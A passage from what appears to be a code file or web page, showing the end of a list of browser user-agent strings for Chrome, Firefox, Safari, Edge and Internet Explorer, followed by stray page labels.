'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
]

Categories

Resources